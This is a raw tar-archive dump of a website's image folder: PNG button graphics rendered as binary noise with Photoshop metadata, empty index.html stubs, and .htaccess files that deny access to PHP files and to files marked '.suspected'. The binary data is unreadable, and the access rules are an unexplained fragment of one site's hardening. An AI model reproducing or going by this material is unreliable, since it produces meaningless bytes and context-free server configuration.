</IfModule>images/05/03/previousbg_hover.png000060400000004215152434416630012563 0ustar00�PNG


IHDR�!�I�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:B080E3E6537E11E3B590E4DE3D82C405" xmpMM:DocumentID="xmp.did:B080E3E7537E11E3B590E4DE3D82C405"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B080E3E4537E11E3B590E4DE3D82C405" stRef:documentID="xmp.did:B080E3E5537E11E3B590E4DE3D82C405"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Eĸ@IDATx��[k�UU��46je5�Q�H���Q�^D�Z�#�ԲD���?��E!ك����(E)��)u���R3�H���<���pν�\�9�������Zg������6���ɯ:Cr8}�F�#�0x3xl���	���_����TVrk����O�k}�o[}�*���dp�K3xVi]px��~S�]�	�
�軮?�ۃ+�+Kb0��+Lo��r��(�g?ʑ��Ids���ѵ�3L�3�%���r�
�����<�:����|	$�_r�$-��/��@���-r�����	$�I�"3�T��_UY]��E��c0�>��{�GE�ô9��"ptQ�L��R�Xa��#�Kr�!X���d.��!vi	���Y���a���Q`��]1�1p��bɆBK$F��_�����b�-!��r��VM51�czI�`#��H�xWz\Q>/cu�4x�A"hH$W
Ch��ai���9�-B?z�z�C���A��
�O*`9G��q�]�p�2,�y~����W;�u=����@��0����`��dl�\�\]e�0pܷ��,i���$��3��ܟ�J�b��y�KWQ�ڑk�G$�d�����=��gO�	�=.��	I�l�gxS\�!=0/c�h�R�E��3	�Og��֘5ݔ��?s�~M�
|�]�\g����BF�U��0L|gޡlh�8���]�c|�z�y
(�9)��	����w�L�1���!�p㹎�ɘ�!�!���|�?�w� ΅�&�K�0@r�`��2�<��K/�/Ƹ��o�����Ʊ7ה�a���P�
#��q^È`;���cR>l��8�	1��:����s�d��Y2-���e�!ϹXu����	����E킞���晎R�3�ح�0⏈��{�ZE���lC?N)�Bae%˗f�U��|C!�A�}n���UN��H�Y���������ϯ'�k?�|��|A�:��8oDl�@�haH���w8o�����׺��K�<���r�}��M�B�R����B�Ci�YQY���_����+�\C�7���~��z��&J�ȻUՅm�O���D<���P-�T�#�1�I����w]�b����h�&�0�gNr�I�1ٔ�އ��n�揷MRՙK
n9/�����8M�{����ܝ�e4�G�`"���e�@C��AOj��5^�4.�C/���?�#o��G�IEND�B`�images/05/03/index.html000060400000000042152434416630010454 0ustar00<!DOCTYPE html><title></title>
images/05/03/.htaccess000044400000000424152434416630010263 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/05/03/previousbg.png000060400000003160152434416630011356 0ustar00�PNG


IHDRl!<�NtEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2BD44207C23E11E38A6CF27180F60E24" xmpMM:DocumentID="xmp.did:2BD44208C23E11E38A6CF27180F60E24"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2BD44205C23E11E38A6CF27180F60E24" stRef:documentID="xmp.did:2BD44206C23E11E38A6CF27180F60E24"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>R�y�IDATx��MHUA�g��'���*�]�&HpS��EPA�("���(mJ!E�U_��Z��eE�0ZJ�6},*D}�ϻǸ>��;/��%8?�s���.Ο3sf�K���r�G�
Bx()�9?�u�avz�8h���r,�jF�-�u�jfi�Ah���	kjj8풼:c�9mP��W���?4 9u��e70��.�R���P>א��j�~�	ySn絩��a]����x	ö[�a0��Gr��}*XM�0+�p���y�7t�5hڇŭa�P���;Ϡ�0�s�Q�,Y�P]�4wBu�?o|�.@Õ'�f-�0����B1���U��2M�Ik�5�E��Q�4Q�WW�O4��2UW�0�Eg�ԕhɣ7�C{��A����FɡW�Ox�U�`n~v.��eB#�j�f-�O:�Д�N�,3&شo6�X�/~"W|�(x��+�1��bg��K�i��H�2��״�=pt�����.3
��VY`4U��(4'��Fڭ�K8�����:��ȴW*<.�s�����TM��1��qɧS^��9���]�a�2:�<���I�
�R��u@U�{��M3L�J���]{37:�0�ֲג['�������Q@��:�n=��kno�ܜ�5����c���
��
�M���8�3����.1��Y�i�U�E��1e��#,�7܀|�V���Θq�Fz+
胶�w#�F�t@,���=����
���pJr�)[�["$��ȌIpIEND�B`�images/05/03/nextbg_hover.png000060400000004176152434416630011673 0ustar00�PNG


IHDR�!�I�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:EDFC3F96551211E39374FD3F56342EC0" xmpMM:DocumentID="xmp.did:EDFC3F97551211E39374FD3F56342EC0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EDFC3F94551211E39374FD3F56342EC0" stRef:documentID="xmp.did:EDFC3F95551211E39374FD3F56342EC0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��1A�IDATx��klU��HÂ�@UPD�B��"(�P-�Fy�[ Q�/��TQA��MP�F�W�+!E��"�VP$jA��.�ÜM�aw���/��;3w�nr�{��s��*�/Q>�����`�
N�m��
[�i�D�iԦR�>�,8	V�L˵�T��`8�|�*H��o��ׂ6C'�5��`hc�><e�L7�
x؇D�k
�%(3P��AOӹb��t��Or[=*qE�"��A��~���Nj���i��-4��|�U1��?8
J�K���G��5��D�|�TG�����xDf5�_��`N�#D�v`3��?L�|�#C�����)%�]��
KlҢA�]�Q*#�?�+�F󱗆p�
D����a;'n3�����#��]�}��&����@��&reQ�C��2�#�+P�}���j�^�L�/���'r��P�e��L����E��R�X�05%C���H@U��HU��a��^SLǓ�l�8l��W�6?6�+��wh��ͷD�.!zpe�좭�4�Xͳ��(p�e�OP�*ƹ��4�x��D���j�"�	��:P��l+f�Ns0:�}�S�^ρ�:���A���q�v'�����@�<��!����:�T��.F�\���\�e�F�L�T��E�[�-���ϯ*�$S�2���L%g�~*[~���>�ȳ�C�F-��5C6��%&i{Ḷ_�%�
��t�
��tL��W������5�#�qzIL�"�5s̎�kɡ��5Қ�i>>Ǎ���$�s2��<C�`3�ݮ��D�h=�pPY�zʛ`�͇h�ώ�}�M�����4�-�x�M�Rk�!������t�v=���A�2���Ï2�(�G��(Y��Qẓ�4�WFY�MTFǏ�m�r�E�g��%q�D�`��{�:����x��26��i��}V��$V�����ʯhoU��G��[E���ih=<��"�
M�Þ�Q�)3�)c
��R�Q-�N�!6��r���^��Nb���v�Ti�r2�$N��o���Zc��b�s��J��2���3)>�#*,s��J����T��"�O`�K1�8�
	�f���(����E�����4C2�_�).i���$EͫphK���]�*�\���D"�7�3a)�5�~�26�4rR9U�ݢ`EƑ0C"mf��l��G�t
��
^
3B�"��i�|#��0�$e]��IEND�B`�images/05/03/nextbg.png000060400000003131152434416630010456 0ustar00�PNG


IHDRl!<�NtEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:150CEE44C23E11E3974C803FD2E3D220" xmpMM:DocumentID="xmp.did:150CEE45C23E11E3974C803FD2E3D220"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:150CEE42C23E11E3974C803FD2E3D220" stRef:documentID="xmp.did:150CEE43C23E11E3974C803FD2E3D220"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>ٕ~[�IDATx��AHQ�gfհ"�40;v
��`b��D!�A��Kf`��CD�Du��CV�]�C7�
��y)Y�ܶ��~�0o�̼A�~�g�����7�{o�R�d	ۇ*��u�m����v
�'��NOǣܼ�@'����D�^�8�)�3Ϯ��+�&B=4���8+��/�&�)h@;��wsS<M�ITYs���KtCC�э��7&��9����I4!�.���&ޥ�	�*t'�;,=�R���cځm�y�����O��8;���&R���fqi�މ�ơ
���#�o����h�k����x�
�t�
�2�c��+�‚v�7��QhA�4�ahj���,K`F@�e��a
:�{�1h����X+4��`��}��ӻ��Tg*��OP���
�U:���������1	+V�A�)q'�+L0M����Z�	,��V�-5f�{�.��Y�,5V��r�������u����<�~-�w+��3�B]аxi�	���_��3�ƃh�Q�L�%h����p�
�A�B�D<M�\�Cu��!�j��*�!���e�51F֒��E��&��^�+�3�t2�N҄�K�����8���G'D'w�*΋��C��TWQX�}?˥��9�f�K<+��Na�
p���N��|?}��?�_�B����m��N�L� �U�8���phB:�C-(�հ�W���.C:a,�3�y�IEND�B`�images/05/03/submit.png000060400000002450152434416630010475 0ustar00�PNG


IHDR_ t8��tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:21A0FB52537F11E3A835E752E8C86B7D" xmpMM:DocumentID="xmp.did:21A0FB53537F11E3A835E752E8C86B7D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:21A0FB50537F11E3A835E752E8C86B7D" stRef:documentID="xmp.did:21A0FB51537F11E3A835E752E8C86B7D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>v�
�IDATx��=KAE�I�Rm��?��X��"�4
�� ;�Xhg�Z����i�Q�S�V���]!�2Yv͂�7ͽp��4g_��L�q��>�Eaԓy�J�g�6jx���1w &�z�6w�/���!��487���5�s'�����(D����N����1������o[�}���%r��Z��>��%���@}n�Nܬ�q�kO凥��e��:��`tQ�~�Y���a�$��@���<pͺ
���q�Ot&�5��xT�J~*w|�~�A���K�P�>?����h1�s�I�ӕ�����/���0Hmz���a��t��x�x���G���,���Q��{��?�Y0C]:�/�7��2?�M��'��T�o��Ie��S���0v)=cy�r�IEND�B`�images/05/02/index.html000060400000000042152434416630010453 0ustar00<!DOCTYPE html><title></title>
images/05/02/previousbg_hover.png000060400000004240152434416630012560 0ustar00�PNG


IHDR�!�I�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:91E9DBFE537B11E39378EA9F3F892717" xmpMM:DocumentID="xmp.did:91E9DBFF537B11E39378EA9F3F892717"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:91E9DBFC537B11E39378EA9F3F892717" stRef:documentID="xmp.did:91E9DBFD537B11E39378EA9F3F892717"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��skIDATx��[ilU�ﵴ��D���%H4
UaI�B(�Z��H�d���m�%,B	�,��R�	Q�WB<�j��6Z(�;���t��Σ3���/3��;���{ι�E����.�����	 9�
��t���M\��?�:pDWB1;���j0GӶ��j��28�h�,
\	N�'u��Bk�o�દ]��"B�
�u��6���󀨆"8l��G5�^;;ܻ�G�/l�@wp���u"�p��,0<>�a��r���1>��,�z�k΀�@/y��Ap�_�D�L��7�g�"o8�d��"JB6�B���6��5�W&�zp�&9|A7�c��@�b怃�O������1���|��1.E� M�}O�
�8�ΡI>vrYx��>M��<�qj��Ni�n#
W[D)A-�WoN��=���x���+�K��GT~BG���R0_�:�>.B��ic���}�P~@cA�8�7�� <�ɹ�Xղ�h-
+��}��ӌgL=���9���ed�O(���N�l(�/g���|�_L�*�Ep��8����U�q!߃�q���p@��r
,� nGY�<��C\��8N�6Y�N�H�����;��BC�2�vk���}Pi.8%�_�ȰF�:����G��s����%�
���⛔���o���@g؛���C?I�Yw�#�0:	pxD��%�DjgATy�2���WO��&^S��8_f��
2�MK���i�A�����r�DG��ψ�2:�	,�1]���P.7Oď��K'H
p�fA{�*���KQ���qσ��?���G�TVR��y��9_��_��6�z?c�����|�I�vg^g�!�{>o�j��-Y�*TvqD�e�j��V-z�gД�%�1_�fآ��t�2Z����'v?�	����Ծ������tTF;{��ٕ�T�T���>p���6��i�m~�F�-,�`�}�с�8QCq�����$
��Xմ��|���
*Yi��x2��Q�B\o�
���:�P�jr?q�a.���*co���r�>.��%�VC�FeA}��!������|m�k�_�&�5�o������/�UՅl��ݿ�p/���,�&'O���m�.�C,���s�����y�?ZE\Mء�$Ź�$�1�)��B%�M���-�C�˟B�a�� '����q�w+����� _F�_�%2�@"��LN� ����k��n\R��Z��
0��D&^f�=IEND�B`�images/05/02/previousbg.png000060400000003154152434416630011360 0ustar00�PNG


IHDRm!�b%AtEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:F6175E18C23D11E3809DD01320B5ECD8" xmpMM:DocumentID="xmp.did:F6175E19C23D11E3809DD01320B5ECD8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F6175E16C23D11E3809DD01320B5ECD8" stRef:documentID="xmp.did:F6175E17C23D11E3809DD01320B5ECD8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
��IDATx��;hQ�gvW#��X����`�"����"bP�P���B-R��Q|��
>1 �TA�AA,l|�(Y���qo����f� �~Nv�N���ܹw�R�S�/r�g^��rS-��o�%l���W�3��ͧ�S�k�d,�)�P����c
����mb�C�#�>4�?�U_�h=��Z�G�R��U�n�h͑��Z����M9�^��S�&h%��Q^��z�
��څ~[-Dl:��
��m��d�9���?�<D���V�e��*�G���̥Y���P��`$�Ҥ�)�50gQZX�:��/�9�Z�K'�G���q�ՁMt]V0O>w�E��/4k67?_�t�i�q�K��A�G�Ⱥ�:j��Ź�蟌z�

�같*+B)�nK��f&�}��K��Sw#=w����깧y��rQ�K�vs��Z�f�]��/5
f�l���S6t�3�
^�`O�l�'0G=B;M�{F9�^:�ڄx�YA�#C3A��i�<6�(Z�B���A���@SI�+�/Bۥ�"s6�&����S�!j3�]ZH�f�A�m����6�Q+Iٷ��X��~�Y~�k��{�f�ϱrm��ɋ��<��43`th&�����s�D�������ۆ�5��C�Ͳ��>���(�����;�u��
:m�*4�<L~��y�4y�V�/��2�в�[�,�Y��r�›���IEND�B`�images/05/02/submit.png000060400000002454152434416630010500 0ustar00�PNG


IHDR` �}TtEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2386505F537C11E3AA89CF9E354E5CC5" xmpMM:DocumentID="xmp.did:23865060537C11E3AA89CF9E354E5CC5"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2386505D537C11E3AA89CF9E354E5CC5" stRef:documentID="xmp.did:2386505E537C11E3AA89CF9E354E5CC5"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>=���IDATx�욽JA�/�F���j#y��(b���`@,�ZX�P-��BP!�6
6bjQ���]!�2Yv͂�s�s�C��4�a�z'	��;�%a�T(�G�P
��T��iP�y�
̂q����bw@!��=0N���`���`��ҬO��n�R��$���폵���>�����W��5��M���ԗN�q�H}��F�/�U=`��)���6X��9��	�#b�@̃
u�5a3L�*���:�Dǻ����Q��2�I��ڝp
��Og�؞P�>�A�l�1�R�h����
���a��K���0 ��"���Z���d��4~
�R�\��P�^;v��g�u��,�|�*ӛ6�K7�g�Be������Ken�G�y�=r����IEND�B`�images/05/02/nextbg.png000060400000003147152434416630010464 0ustar00�PNG


IHDRl!<�NtEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:D0FAB3BBC23D11E3BCB894F64CCFD90C" xmpMM:DocumentID="xmp.did:D0FAB3BCC23D11E3BCB894F64CCFD90C"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D0FAB3B9C23D11E3BCB894F64CCFD90C" stRef:documentID="xmp.did:D0FAB3BAC23D11E3BCB894F64CCFD90C"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>|g��IDATx��OHTQ��Ǧ���P#�(�pk�
B-*p\H��1]���
���M�F7Aw�.
r��pӜ���d��;Oy�>��f޼���9��?��z��G�.���U��1�-t]]~��u�c{��xkE�P 6;"�Z�Q0��}�i�U�xkM@W��H<��AKU�cWe�g�X��+�M�f!ՏqM���D�s�&�
���]dz�B:���:��m�H�Ε/Z���4���A���*���u��h���T=��FӔH#��Gs��<����(��9p]pEUU?)D��t�C�ߋ�NT
��m).�$u	̝��Z�Zb��٤60��KgZ�0���+	˹N��x����B��H��(���ƺ��r^���o�����''���ŷHD�����ץ�g�*�gV���Ɛ˔rwC�֓�-�Yd�)�:Ls쾷�y\�dߥ�X'��)����_��N�aMk�����7��O��}��_)X�w�+��xjM��jGu孱�\Y�!�/��B+�1~v=7�tN|��>�5�\9#,
-A���9ހ���,��h��]ڭ���V�T
};��m<�t]�
]4
v��2��v�	n�~�S��fєxY�
])�5o:a�
���?{�Mݏ�LK� ����E;��w"��>��jų�D�y�Z(t"��Q	+r�	iS����D�IEND�B`�images/05/02/upload.png000060400000003601152434416630010454 0ustar00�PNG


IHDR) �oQ>tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:F838CE13537A11E388E0AF803EEA01D6" xmpMM:DocumentID="xmp.did:F838CE14537A11E388E0AF803EEA01D6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F838CE11537A11E388E0AF803EEA01D6" stRef:documentID="xmp.did:F838CE12537A11E388E0AF803EEA01D6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��O��IDATx��XYOa�t��t�����%]L�H"F!�(&&��������KL4M@L,����J���۴�
�p�Ig���w�{�9��0���G�ɹ��2���z~i��?sr9W`� �罱X,򷷷���R��p��0��r��Z�<88��它�x<�#����ƔJ��`0��a�����jW�
pGGG�Z�g�ɤ�k 1���>.���V���y,N��t�g���E��DR�\T���D�L��>��1�?�@W*�?�F�&��+��h��Os�T)'������8֥R)+�`�Z�ﱀ"�t#���"�Bd�0QJβ�7�9̬#���2�P(h4�����>�X�B����ܵG��q<G��s�^� ag��T*ݴX,o.}"�%�,L;��U-
u8+m�ID0h��_�7WW=��:@����<�o|>��c��\��.���B��l���a����t;X������U3G��
�b�����www��ȣs�L��z�A5*.�@j��&���U1�D��i��H���Q�H$1���̒@�l
0U'��1Xl�c Qu����bU*UH.��48C�]�*�55>|�b2�^`l�S�ႇz��C'P�;���mE�P�:	���55|�v�枞���*�_��NvD��tڂZ<�tQ���q
��Z�?@�e'��3��J �s�����6��Q`R�=��UjՊ�����d�ٿ���E�T?�*j|"=H���5���a��vP�7��i��i|y��Ś�:���f�@
qݮؖ���F��<�[ӈ�G*�Ȁ�,�D ����Z��i���6
b�Le�x
�="�t �aQ�s	�^�@��(u��̘��vL(�&�yB�긇�G����A���:豑��%� I�H���M�q`�Mޙ&!�_(��}������f��Eɱ�;�q.`��{��yT�0�J;�l6��
��g�*|��-�S*ݥ�IEND�B`�images/05/02/nextbg_hover.png000060400000004205152434416630011663 0ustar00�PNG


IHDR�!�I�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:DF0ACDC3551211E3A872C33D44932EAD" xmpMM:DocumentID="xmp.did:DF0ACDC4551211E3A872C33D44932EAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:DF0ACDC1551211E3A872C33D44932EAD" stRef:documentID="xmp.did:DF0ACDC2551211E3A872C33D44932EAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>>�%��IDATx��y�UU��{���hn冉��:��D�c�G&����B���3��2H�FdV���)��"�F1j:���ᾤ�Nc����\nw9��]��}���y�<�}�9��;�D*�Rn�{����;8���i0�'�V�Ū��n��q�~�W�dY�u`)�
>�A����)!X�0����w �߀���S@G�w:�] ׇD��S�]Pf�6�A�g���8�+��mu��-��a�Df(�m>/��`6��Z�>������
�s�J�%�p���g�#N�BP���k�jDቒ�|$��4����/��&���4m䁻�D0^b�����u���j���B�N)���r}!"��E/�E`��i�Rgh
.�S�`0���B6�	�XD#� ���	$�?,96K�
���q=�u��������D�l���&�f@�x��8d�y�Rma߫�C���(��D���(���j=-�0~4T:,MI��N /K�"U	��ms\�y�0'����M���e�;d"�d-X��S3��G�&�Ht���ՏG��\���a��K�
��;�c�J?�mЋ���n`�u��*b�8��l+f�N�0�O�����z�	�3*.=�A��(N<�$N��:%�42��h�:Nu�@E�mb��E)�'�+�����|�̠��ں����vr�"�^I2�P��za���\�||�3�<����iY?2��8B�����I�*�x	\3]�>4����8elB������,�9�G�n�XD����g���0�k,�q��̺iqT9�7�)�s2�mb7hni��9B��$6���������)(s��&@��#j�.GS��3�uZ��x�&�yq��ή%�z~Gg�j`珪j���|ފ�H�!�%F��VzE�<� 5�4��0e�cx��vh�K-bx,�8E�f#蚡\�c,�Ǐ�8@k�����X�*�<,���R�t6����{�#�X�[E������>��x�&z��bT����}���bs���s-�NZ!�7�?	�!_�:m�
����,4���v�Ti�r
�$�gk�����(V�0���u�����V8]̤�L�e*OS�8xץ�q&8	���fF)�P����EG�aT���@�`S\�h?�I���K�.�e�(X��EC�:CC�(�A�A��߀:��4U�TNS�v�(XQ�q̐��0B���#6�}`��^
�!���b��5O���Ȍ��U˜IEND�B`�images/05/02/.htaccess000044400000000424152434416630010262 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>images/05/02/previous.png000060400000003042152434416630011043 0ustar00�PNG


IHDRl ����tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:E2F1FF0C537B11E3B6939252A69264B7" xmpMM:DocumentID="xmp.did:E2F1FF0D537B11E3B6939252A69264B7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E2F1FF0A537B11E3B6939252A69264B7" stRef:documentID="xmp.did:E2F1FF0B537B11E3B6939252A69264B7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Fg��IDATx��AHQ���{(Y	j	�
.�E��Y B�!��Dh#��jQ
�"[E	�k�""��
W-A�ښ.L_����x:�=��ٜ~.�f\�?��s�� 0�5vb�6J�lB$n?�j|aX5X��[+�*�b_��e�To�Pk`�jS_�Q
]�%0T��Q��:O��O	+�e:�~Z�TMAP�Ь800]U/���:�S�����ˈz�4>eD{¢�|��o�
�A��=�65�w�݇~��DTW���S~��u#*��*a��0�:!=��A�Ŵ�/�:��	��Z�7�\]>�P��V̍>¢3B:+��Gg��ڋ
